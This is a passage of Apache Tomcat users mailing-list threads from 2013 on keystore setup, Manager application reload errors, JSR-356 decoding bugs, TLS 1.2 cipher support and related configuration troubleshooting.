server.pem -inkey server.key -certfile intermediates.pem Verify that the contents of the p12 keystore with: openssl pkcs12 -in keystore.p12 -nokeys You should verify that the certificate chain is complete (up to, but without root CA certificate). Now, you may use that keystore for BIO and NIO connectors: keystoreFile=keystore.p12 keyAlias=myserver keystoreType=pkcs12 Or you may convert it to JKS keystore as Leo suggests. -Ognjen [1] https://bugzilla.mozilla.org/**show_bug.cgi?id=399324#c72https://bugzilla.mozilla.org/show_bug.cgi?id=399324#c72 --**--**- To unsubscribe, e-mail: users-unsubscribe@tomcat.**apache.orgusers-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: possible tomcat 7.0.47 jsr-356 bug: NULL pointer being thrown when DecodeException is caught in PojoMessageHandlerWholeBaseT.onMessage
Morning Bob- session should never be null..this is a bug create an account here https://issues.apache.org/bugzilla/createaccount.cgi and file the bug report Many thanks for discovering this bug and helping us to improve the product Martin __ From: bob.dere...@thingworx.com To: users@tomcat.apache.org Subject: possible tomcat 7.0.47 jsr-356 bug: NULL pointer being thrown when DecodeException is caught in PojoMessageHandlerWholeBaseT.onMessage Date: Sat, 19 Oct 2013 12:46:05 + I am testing what happens when Encode/Decode Exceptions occur during JSR-356 communication and found that in the following code in onMessage, the ((WsSession)session) is NULL. As a result, the actual DecodeException (cause) is lost. // Can this message be decoded? Object payload; try { payload = decode(message); } catch (DecodeException de) { ((WsSession) session).getLocal().onError(session, de); return; } Tracing this further up the stack, I found that Util.getMessageHandlers is initializing it and passing NULL in for the session: if (decoderMatch.getTextDecoders().size() 0) { MessageHandlerResult result = new MessageHandlerResult( new PojoMessageHandlerWholeText(listener, m, null, endpointConfig, decoderMatch.getTextDecoders(), new Object[1], 0, false, -1, -1), MessageHandlerResultType.TEXT); results.add(result); } Is this a bug, or do I need to do something else to get this internal session initialize - in addition to calling: addMessageHandler(this) in the onOpen of my Endpoint-derived class? Thanks, Bob DeRemer Senior Director, Architecture and Development http://www.thingworx.com Skype: bob.deremer.thingworx O: 610.594.6200 x812 M: 717.881.3986
RE: can't connect to manager application
Date: Sat, 19 Oct 2013 10:23:11 +0200 From: edoa...@aspix.it To: users@tomcat.apache.org Subject: Re: can't connect to manager application Il 19/10/13 00:24, Mark Eggers ha scritto: On 10/18/2013 3:18 PM, André Warnier wrote: Edoardo Panfili wrote: Il 17/10/13 18:45, Edoardo Panfili ha scritto: My Tomcat (7.0.42) is listening on port 7080 and I have this conf/tomcat-users.xml in (production server) --- tomcat-users role rolename=manager-script/ user username=myname password=pwd roles=manager-script,manager-gui,manager-jmx/ /tomcat-users -- if I use curl -u myname:pwd http://localhost:7080/manager/text/reload?path=/myApplication the response is-- h1404 Not found/h1 p The page you tried to access (/manager/text/reload) does not exist. /p p The Manager application has been re-structured for Tomcat 7 onwards and some of URLs have changed. All URLs used to access the Manager application should now start with one of the following options: /p ul li/manager/html for the HTML GUI/li li/manager/text for the text interface/li li/manager/jmxproxy for the JMX proxy/li li/manager/status for the status pages/li /ul p Note that the URL for the text interface has changed from quot;/managerquot; to quot;/manager/textquot;. /p p You probably need to adjust the URL you are using to access the Manager application. However, there is always a chance you have found a bug in the Manager application. If you are sure you have found a bug, and that the bug has not already been reported, please report it to the Apache Tomcat team. /p - Installation step by step: Unpack new download from tomcat.apache.org 1- set users tomcat-users user username=edoardo password=pwd roles=manager-script,manager-gui,manager-jmx,other/ /tomcat-users then reload tomcat $curl -u edoardo:pwd http://localhost:8080/manager/text/reload?path=/examples OK - Reloaded application at context path /examples 2- copy myApplication from production server copy configuration file ($tomcat/Catalina/localhost/myApplication.xml) from production server stop start tomcat $curl -u edoardo:pwd http://localhost:8080/manager/text/reload?path=/myApplication OK - Reloaded application at context path /myApplication 3- first modify to server.xml shutdown tomcat modify server.xml Connector port=8080 protocol=HTTP/1.1 becomes Connector port=9080 protocol=HTTP/1.1 start then curl again all well 4- second modify to server.xml Host name=localhost appBase=webapps unpackWARs=true autoDeploy=true becomes Host name=localhost appBase=webapps unpackWARs=true autoDeploy=true deployXML=false stop-start $curl -u edoardo:pwd http://localhost:9080/manager/text/reload?path=/myApplication javax.servlet.ServletException: Error instantiating servlet class org.apache.catalina.manager.ManagerServlet [...] $curl -u edoardo:pwd http://localhost:9080/manager/text/reload?path=/myApplication the same error reported in the initial post (above) deployXML=false is recommended at http://tomcat.apache.org/tomcat-7.0-doc/config/host.html and useful for me. One big difference that I see when deployXML=false, is that this file : (catalina_base)/webapps/myApplication/META-INF/context.xml is no longer being parsed, and instead this file is parsed : $tomcat/Catalina/localhost/myApplication.xml when you reload your app. What is the content of that file ? From the last log file that was posted, these context files are pretty broken (although myApplication.xml only had the magic debug attribute set). - unpack tomcat - add an user in tomcat-users.xml - modify server.xml adding deployXML=false to Host Host name=localhost appBase=webapps unpackWARs=true autoDeploy=true deployXML=false - use manager application via curl $ curl -u user:pwd http://localhost:8080/manager/text/reload?path=/example error page. # cat manager.2013-10-19.log 19-ott-2013 10.16.17 org.apache.catalina.core.ApplicationContext log INFO: Marking servlet Manager as unavailable 19-ott-2013 10.16.17 org.apache.catalina.core.StandardWrapperValve invoke GRAVE: Allocate exception for servlet Manager java.lang.SecurityException: Restricted (ContainerServlet) class org.apache.catalina.manager.ManagerServlet at org.apache.catalina.core.DefaultInstanceManager.checkAccess(DefaultInstanceManager.java:538) at org.apache.catalina.core.DefaultInstanceManager.loadClassMaybePrivileged(DefaultInstanceManager.java:511) at org.apache.catalina.core.DefaultInstanceManager.newInstance(DefaultInstanceManager.java:137) at org.apache.catalina.core.StandardWrapper.loadServlet(StandardWrapper.java:1144) at org.apache.catalina.core.StandardWrapper.allocate(StandardWrapper.java:865) at
RE: can't connect to manager application
Date: Fri, 18 Oct 2013 18:04:19 +0200 From: edoa...@aspix.it To: users@tomcat.apache.org Subject: Re: can't connect to manager application Il 18/10/13 16:40, André Warnier ha scritto: Edoardo Panfili wrote: Il 18/10/13 08:43, Ognjen Blagojevic ha scritto: On 18.10.2013 7:34, Edoardo Panfili wrote: To rule out faulty upgrade, could you try to reproduce the problem on clean Tomcat 7.0.42 install? the problem was surely present with 7.0.39, the 7.0.42 is a fresh installation for me. Could you please clarify: does the problem exists on 7.0.42, 7.0.39 or both? both Could you provide steps to reproduce the problem on fresh 7.0.42 installation? - unpack tomcat - modify listen port - modify tomcat-users.xml - copy jmxremote.access and jmxremote.password (setting permissions) - build jsvc - copy configuration files for applications (in $tomcat/conf/Catalina/localhost) thank you for you question: also jmx remote access is not working (in both tomcat 7.0.39 and 7.0.42), maybe the two problems are related? I tried to reproduce with the information you provided so far, but I was unable. It works for me. Also on my local machine, where jmx is not configured. Usually, a good place to look first, are the Tomcat logfiles. What do they say ? searching for java.lang.SecurityException: Restricted (ContainerServlet) class org.apache.catalina.manager.ManagerServlet MGmy HostManagerServlet is defined in webapps/host-manager/WEB-INF/web.xml as: servlet servlet-nameHostManager/servlet-name servlet-classorg.apache.catalina.manager.host.HostManagerServlet/servlet-class init-param param-namedebug/param-name param-value2/param-value /init-param /servlet servlet servlet-nameHTMLHostManager/servlet-name servlet-classorg.apache.catalina.manager.host.HTMLHostManagerServlet/servlet-class init-param param-namedebug/param-name param-value2/param-value /init-param /servlet /MG seem that the solution is to add privileged=true MGmy privileged attr in Context is located at /webapps/host-manager/META-INF/context.xml as: Context antiResourceLocking=false privileged=true / /MG at $tomcat/conf/context.xml... and the reoload command now works. thank you Edoardo MGmolte grazie Edoardo MGMartin - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: can't connect to manager application
source http://localhost:8080/manager/text/reload?path=/examples /source Signal an existing application to shut itself down and reload. This can be useful when the web application context IS NOT RELOADABLE and you have updated classes or property files in the code/WEB-INF/classes/code directory or when you have added or updated jar files in the code/WEB-INF/lib/code directory. Context reloadable attribute would need to reflect reloadable=false e.g. Context path=/petclinic reloadable=false Buona Fortuna, Martin __ Si prega di non alterare o interrompere questa trasmissione...Grazie Date: Thu, 17 Oct 2013 18:45:30 +0200 From: edoa...@aspix.it To: users@tomcat.apache.org Subject: can't connect to manager application My Tomcat (7.0.42) is listening on port 7080 and I have this conf/tomcat-users.xml in (production server) --- tomcat-users role rolename=manager-script/ user username=myname password=pwd roles=manager-script,manager-gui,manager-jmx/ /tomcat-users -- if I use curl -u myname:pwd http://localhost:7080/manager/text/reload?path=/myApplication the response is-- h1404 Not found/h1 p The page you tried to access (/manager/text/reload) does not exist. /p p The Manager application has been re-structured for Tomcat 7 onwards and some of URLs have changed. All URLs used to access the Manager application should now start with one of the following options: /p ul li/manager/html for the HTML GUI/li li/manager/text for the text interface/li li/manager/jmxproxy for the JMX proxy/li li/manager/status for the status pages/li /ul p Note that the URL for the text interface has changed from quot;/managerquot; to quot;/manager/textquot;. /p p You probably need to adjust the URL you are using to access the Manager application. However, there is always a chance you have found a bug in the Manager application. If you are sure you have found a bug, and that the bug has not already been reported, please report it to the Apache Tomcat team. /p - on my local machine all goes well (same tomcat version but on port 8080), can't figure what is different on production server... where can I take a look? Some release ago (tomcat 7.0.x sorry, I can't be more precise) all was well also on production server. Maybe i did something wrong during an update. thank you Edoardo - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: RSocket Error
MG1)the problem calling executeMethod will need to try{..} catch for IOException and HttpException /** 308* Executes the given {@link HttpMethod HTTP method}. 309* 310* @param method the {@link HttpMethod HTTP method} to execute. 311* @return the method's response code 312* 313* @throws IOException If an I/O (transport) error occurs. Some transport exceptions 314* can be recovered from. 315* @throws HttpException If a protocol exception occurs. Usually protocol exceptions 316*cannot be recovered from. 317*/ 318 public int executeMethod(HttpMethod method) 319 throws IOException, HttpException { 320 321 LOG.trace(enter HttpClient.executeMethod(HttpMethod)); 322 // execute this method and use its host configuration, if it has one 323 return executeMethod(null, method, null); 324 } MG2)If you have a reliable HostConfiguration why not use that? MG /** 352* Executes the given {@link HttpMethod HTTP method} using the given custom 353* {@link HostConfiguration host configuration} with the given custom 354* {@link HttpState HTTP state}. 355* 356* @param hostconfig The {@link HostConfiguration host configuration} to use. 357* If codenull/code, the host configuration returned by {@link #getHostConfiguration} will be used. 358* @param method the {@link HttpMethod HTTP method} to execute. 359* @param state the {@link HttpState HTTP state} to use when executing the method. 360* If codenull/code, the state returned by {@link #getState} will be used. 361* 362* @return the method's response code 363* 364* @throws IOException If an I/O (transport) error occurs. Some transport exceptions 365* can be recovered from. 366* @throws HttpException If a protocol exception occurs. Usually protocol exceptions 367*cannot be recovered from. 368* @since 2.0 369*/ 370 public int executeMethod(HostConfiguration hostconfig, 371 final HttpMethod method, final HttpState state) 372 throws IOException, HttpException {The constructors are weak for HostConfiguration you will need to build empty HostConfiguration first set the Hostname, port and protocol setHost(final String host, int port, final Protocol protocol)then set the ProxyHost and the proxyPort setProxy(final String proxyHost, int proxyPort) http://www.docjar.com/html/api/org/apache/commons/httpclient/HostConfiguration.java.html finally on multi-homed or clustered configurations set the InetAddress /** 449* Set the local address to be used when creating connections. 450* If this is unset, the default address will be used. 451* This is useful for specifying the interface to use on multi-homed or clustered systems. 452* 453* @param localAddress the local address to use 454*/ 455 456 public synchronized void setLocalAddress(InetAddress localAddress) most people use static route to identify a gateway for a particular IP configuration request the static route from your net-admin http://www.nongnu.org/quagga/docs/docs-multi/Static-Route-Commands.html it is also possible on linux to configure specific rules for multi-homed systems details on which rule to use for multi-homed on linux the command on which ip rule you should also be obtained from net-admin ip rule listhttps://blogs.oracle.com/networking/entry/advance_routing_for_multi_homed the rule will point you to the IP you should use in InetAddress Martin __ Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. From: divya.prak...@mahindracomviva.com To: users@tomcat.apache.org
RE: JspTagException- Stream closed
where is the iter attribute declaration for selection HTML tag? http://www.w3schools.com/tags/tag_select.asp Martin __ Verzicht und Vertraulichkeitanmerkung Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. From: tinu.b...@amd.com To: users@tomcat.apache.org Subject: RE: JspTagException- Stream closed Date: Thu, 5 Sep 2013 04:09:34 + Here is the body of the method doEndTag(). The exception is thrown for line number 146, which isthis.iter = null; of the reset method. public int doEndTag() throws JspException { if (this.jdField_bodyContent_of_type_JavaxServletJspTagextBodyContent != null) { try { this.jdField_bodyContent_of_type_JavaxServletJspTagextBodyContent.writeOut(this.jdField_bodyContent_of_type_JavaxServletJspTagextBodyContent.getEnclosingWriter()); } catch (IOException localIOException) { this.jdField_pageContext_of_type_JavaxServletJspPageContext.getServletContext().log(Res.getString(4), localIOException); throw new JspTagException(localIOException.getMessage()); } } reset(); return 6; } private void reset() { this.sDataSource = null; this.changeCurrentRow = true; this.useRange = false; this.ds = null; this.rs = null; this.iter = null; } -Original Message- From: Babu, Tinu [mailto:tinu.b...@amd.com] Sent: Monday, August 26, 2013 2:51 PM To: Tomcat Users List Subject: RE: JspTagException- Stream closed The RowSetIterate tag is declared in the JSP itself. All the JSPs having this RowSetIterate tag is throwing Stream closed exception. -Original Message- From: Christopher Schultz [mailto:ch...@christopherschultz.net] Sent: Wednesday, August 21, 2013 9:41 PM To: Tomcat Users List Subject: Re: JspTagException- Stream closed -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Tinu, On 8/20/13 9:59 PM, Babu, Tinu wrote: Here is the piece of codes which is throwing the error. select name=list1 size=15 multiple jbo:RowsetIterate datasource=userRole option value=jbo:ShowValue datasource=userRole dataitem=RoleName / jbo:ShowValue datasource=userRole dataitem=RoleDesc / /option /jbo:RowsetIterate /select select name=list2 size=15 multiple jbo:RowsetIterate datasource=roles option value=jbo:ShowValue datasource=roles dataitem=RoleName / jbo:ShowValue datasource=roles dataitem=RoleDesc / /option /jbo:RowsetIterate /select Exception is always being thrown from the RowSetIterate Tags in JSPs. This was working properly with Tomcat4 version and when we upgraded our Tomcat to version 6 we started getting this strange exception. Please share your thoughts. Where is the row set itself declared? In the JSP? In a servlet somewhere that executes before the JSP? In general, I wouldn't recommend making any JDBC calls from within a JSP: I prefer to take care of all data acquisition in a servlet (or similar) before delegating the creation of a response to the view layer. But that's just me. - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.14 (Darwin) Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJSFMNUAAoJEBzwKT+lPKRYRDUQAMs3ugmVpr/K0kGMRIV2xHvG cb7Kd2uWrvAnFLqgbj6GuMFQvWsTXcbA3tlaa+iY3FSQEchFnzktONVdqml6CGsB UdumVqg0GFPI9vPM7nq4EOxTZg6QlaVsy2LJ0hbmc4vFaYD6s4uz21yd2IMZ8MJy FjGx6JylFn1c9RjLBegWRWUS3ykkapaZ8lwJU+QUnI1WxLp8mg37FV7ziwKIk5u5 yKc1nquQ/cj2aqUiEdpC2CEwmy05m2APiDmGT/UkKuZoHMRG1/OzLFlKg65RhlvB x0iPSDZv6iP/neZEtGmOsYiQLG9F5/v4ziV+kgsJYbhmb6jtYIYiHcBYrn425Q2W ERhqEuYRXR+2yRxt3/xzB0uSyg3eikhfwNoOrFH2OGgk4cpzSZJRW/E0N2EUYUwr ZRuGpOr4wgpPOrJ3A02hGYpBz2ZtbiingTl/72IlLcgBnBUapWzSazPl4BE7gPe/ VToMDtlxm74qiqtvr8C8swGAK9Y2xwmFkFI2GF2tu7STgbDfIA7f8eILYo3+m57S 3oI/O4aVf38HiKuA5pZmahSU5mLtCi4Fj0RmzDSSwLgi0WYfgUzCsqKDJKFns2qe PRNEyA8w7X4IKI4oJKgP/C7+gl3g8xycEo2C04Q6ZlZHjqfSBqJi6KnxJfdZLoYt t18eSlW8KZBzKKHP7QpT =011K -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org - To
RE: How to retrieve OCSP Information at server side(In Servlet) Tomact ver 7.0.40/Centos
Date: Tue, 3 Sep 2013 13:15:47 +0530 Subject: How to retrieve OCSP Information at server side(In Servlet) Tomact ver 7.0.40/Centos From: sushil.pru...@gmail.com To: users@tomcat.apache.org HI All I want to retrieve OCSP information at server side in servlet . So currently i am using X509Certificate certChain[] = (X509Certificate[]) request.getAttribute(javax.servlet.request.X509Certificate); MGassuming 'someone' was smart enough to place certificate name into javax.servlet.request.X509Certificate a-priori ans also i have configured below value at /conf/server.xml truststoreFile=/LocalDev/software/ssl/server/server.ks truststorePass=password and clientAuth=want Even though i am unable to retrieve value ,It's giving null. ANy idea is there any extra configuration i need to do at tomcat side? MGdifference between accessing truststore and accessing keystore http://stackoverflow.com/questions/318441/truststore-and-keystore-definitions
RE: Unable to start apache tomcat server
In other words ...this was an eclipse plugin misconfiguration? If so does eclipse have a support site for plugin misconfiguration(s)? Martin Gainty __ Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. Date: Sun, 1 Sep 2013 00:27:09 +0530 Subject: Re: Unable to start apache tomcat server From: sushil.pru...@gmail.com To: users@tomcat.apache.org Hi Brit/Marc Thanks for your time . Problem got resolved using below url. http://stackoverflow.com/questions/8520267/localhost8080-gives-404-the-requested-resource-is-not-available On Sun, Sep 1, 2013 at 12:08 AM, Burghard W.V. Britzke b...@charmides.in-berlin.de wrote: pardon! the word resource could be confusing - the better expression is web application which is mapped to / so the web application which is mapped to / is missing or is not configured. Am 31.08.2013 um 20:34 schrieb Burghard W.V. Britzke b...@charmides.in-berlin.de: but this means that tomcat is up and running (like Marc stated before). only the resource / is missing. what is the content of your webapps directory? Am 31.08.2013 um 20:03 schrieb Sushil Prusty sushil.pru...@gmail.com: Hi I am very sorry i am using http://localhost:8080 not https://. I am getting below status when i am opening . HTTP Status 404 - / type Status report message / description The requested resource is not available. Apache Tomcat/7.0.42 On Sat, Aug 31, 2013 at 11:27 PM, Caldarale, Charles R chuck.caldar...@unisys.com wrote: From: Sushil Prusty [mailto:sushil.pru...@gmail.com] Subject: Re: Unable to start apache tomcat server I am using https://localhost:8080. Use http, not https. If you want to use https, you will need to configure an additional Connector (usually on port 8443), including establishing a server certificate. - Chuck THIS COMMUNICATION MAY CONTAIN CONFIDENTIAL AND/OR OTHERWISE PROPRIETARY MATERIAL and is thus for use only by the intended recipient. If you received this in error, please contact the sender and delete the e-mail and its attachments from all computers. - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: Tomcat 7 / Java 7 with TLS 1.2 algorithms
what's supposed to happen: The specified cipher in SSLCipherSuiteSSLCipherSuite is supposed to be enabled when specified within SSLCipherSuiteSSLCipherSuite=SHA256/384 to allow the Server to arbitrate the ordering of ciphers(instead of the client) SSLHonorCipherOrder=true http://tomcat.apache.org/tomcat-7.0-doc/config/http.html does this not work for you? Martin Gainty __ Please do not alter or disrupt this transmission..Thank You From: d...@sosnoski.com Subject: Tomcat 7 / Java 7 with TLS 1.2 algorithms To: users@tomcat.apache.org CC: Date: Thu, 22 Aug 2013 04:41:54 -0400 Tomcat 7.0.40 seems to work well with TLS 1.2, forced by using a sslEnabledProtocols=TLSv1.2 attribute on the Connector. But I haven't been able to make it work with any of the SHA256/384 algorithms - they always show up in the Ignoring unsupported cipher suite list. I get the same thing happening when I try to use them from client code, so I know it's not a Tomcat issue, but I'm hoping someone knows a workaround. Any suggestions? Thanks, - Dennis - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: Tomcat 7 / Java 7 with TLS 1.2 algorithms
point of confusion Eric Rescorla specifically cites SHA384 in his cipher examples for TLS 1.2 Update http://www.ietf.org/rfc/rfc5246.txt http://www.ietf.org/proceedings/70/slides/tls-0.pdf Kuat Eshengazin used bltest as a test harness for SHA384 bltest -R -m prf_sha384 -k tests/prf_sha384/key0 -t tests/prf_sha384/seed0 -h -g 148 -x https://bugzilla.mozilla.org/show_bug.cgi?id=480514 Is this incorrect? Martin __ Please do not alter or disrupt this transmission..Thank You Date: Thu, 22 Aug 2013 14:53:55 +0100 Subject: Re: Tomcat 7 / Java 7 with TLS 1.2 algorithms From: aterrest...@gmail.com To: users@tomcat.apache.org According to RFC 5246 Appendix C (TLS 1.2), there is no SHA384. See : http://www.ietf.org/rfc/rfc5246.txt The JSSE Reference Guide also doesn't talk about this SHA384 as an implementation requirement. See : http://docs.oracle.com/javase/7/docs/technotes/guides/security/StandardNames.html#impl This means you have a problem with SHA256 only. Maybe it's easier to test on client-side, with one of the following ciphers (that you find on the same Reference Guide ) for example : TLS_DH_RSA_WITH_AES_256_CBC_SHA256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 Let me know if this works, or I will try to test by myself with my own client. 2013/8/22 Dennis Sosnoski d...@sosnoski.com: I've already done that, though as far as I can see that doesn't effect the digest algorithms (only the encryption options). - Dennis On 08/23/2013 12:24 AM, Aurélien Terrestris wrote: Hello I suppose you need to run your JVM with the unrestricted policy files (on b= oth client and server sides). You have to download them from Oracle website= for your java version, and replace the old. These files are : local_policy.jar US_export_policy.jar Regards 2013/8/22 d...@sosnoski.com: Tomcat 7.0.40 seems to work well with TLS 1.2, forced by using a sslEnabledProtocols=TLSv1.2 attribute on the Connector. But I haven't been able to make it work with any of the SHA256/384 algorithms - they always show up in the Ignoring unsupported cipher suite list. I get the same thing happening when I try to use them from client code, so I know it's not a Tomcat issue, but I'm hoping someone knows a workaround. Any suggestions? Thanks, - Dennis - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: Tomcat config question: 'compression' versus 'SSLDisableCompression'
as earlier mentioned chrome is the only browser that supports compression on SSL streams Martin __ Verzicht und Vertraulichkeitanmerkung Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Date: Thu, 8 Aug 2013 17:47:36 -0400 Subject: Re: Tomcat config question: 'compression' versus 'SSLDisableCompression' From: dlan...@gmail.com To: users@tomcat.apache.org On Thu, Aug 8, 2013 at 5:19 PM, Christopher Schultz ch...@christopherschultz.net wrote: ... and the SSLDisableCompression setting (when set to false) is intended to mitigate the CRIME attack against SSL/TLS compression. Feel free to read online all about the CRIME attack. That was what I was hoping it did when I asked the original question :) I haven't really done any analysis of SSL compression (that is, compression as implemented by the TLS/SSL layer) alone versus compression-less-SSL + gzip, but I suspect that any combination of compression and encryption can lead to CRIME-like attacks ... That seems to be true since there is now the BREACH attack: http://arstechnica.com/security/2013/08/gone-in-30-seconds-new-attack-plucks-secrets-from-https-protected-pages/ which (I think) is compression-less-SSL + gzip.
RE: LDAP/Realm with TLS in Tomcat 6/7?
you will need to supply any security credentials to that layer and inform the connector you are using protocol=TLS and match each attribute to attribute from the supplied key package (.pfx/.p7b) http://tomcat.apache.org/tomcat-4.1-doc/ssl-howto.html HTH, Martin __ Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. Date: Tue, 6 Aug 2013 13:36:41 +0200 From: ognjen.d.blagoje...@gmail.com To: users@tomcat.apache.org Subject: Re: LDAP/Realm with TLS in Tomcat 6/7? Jens, On 6.8.2013 12:44, Jens Neu wrote: is there a lib/method/whatever to achieve Realm Auth in Tomcat 5.x where username/password are protected by TLS? I never tried it myself, but you might find these links useful: https://wiki.apache.org/tomcat/JNDI_startTLs_HowTo https://issues.apache.org/bugzilla/show_bug.cgi?id=49785 https://www.mail-archive.com/users@tomcat.apache.org/msg80660.html org.apache.catalina.realm.JNDIRealm works with Tomcat 5, but not in 6 :-( JNDIRealm should work just fine in any supported Tomcat version. If you have any problems with it, please report it here. BTW, if you are already upgrading, you may consider to upgrade directly to latest Tomcat 7, to save yourself from doing two upgrades. -Ognjen - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: /META-INF/context.xml seemingly ignored
Nicholas possibly CATALINA_BASE environment variable is missing? http://blog.andrewbeacock.com/2007/08/getting-tomcat-contexts-to-work-in.html gotta love those brit techs! Martin __ Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. Subject: Re: /META-INF/context.xml seemingly ignored From: nicho...@nicholaswilliams.net Date: Sun, 4 Aug 2013 14:47:49 -0500 To: users@tomcat.apache.org On Aug 4, 2013, at 11:16 AM, Konstantin Kolinko wrote: 2013/8/4 Mark Thomas ma...@apache.org: On 04/08/2013 02:27, Nick Williams wrote: Yes. There's a TOMCAT_HOME/work/Catalina/localhost/support directory, but TOMCAT_HOME/conf/Catalina is empty. There should be conf/Catalina/localhost directory that is empty. (The Catalina directory is not empty). Yes, my bad. conf/Catalina/localhost exists but is empty. As expected for Tomcat 8. copyXML is false by default. (Yes the default has changed again.) Huh? The copyXML is false by default in Tomcat 7 as well. I do not see any change here. It might be good time to start migration guide page for Tomcat 8. Agreed. So, looking at this further, this might be an IntelliJ IDEA bug. I'm deploying the application using the Tomcat support in IDEA. IDEA creates a directory C:\Users\Nicholas\.IntelliJIdea12\system\tomcat\Unnamed_Customer-Support-v15\conf\Catalina\localhost and that directory contains support.xml with my context.xml contents. I'm betting it's not hooking that up properly. I'll research that route instead. Sorry if I've wasted anyone's time looking into this. Nick - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: Cert
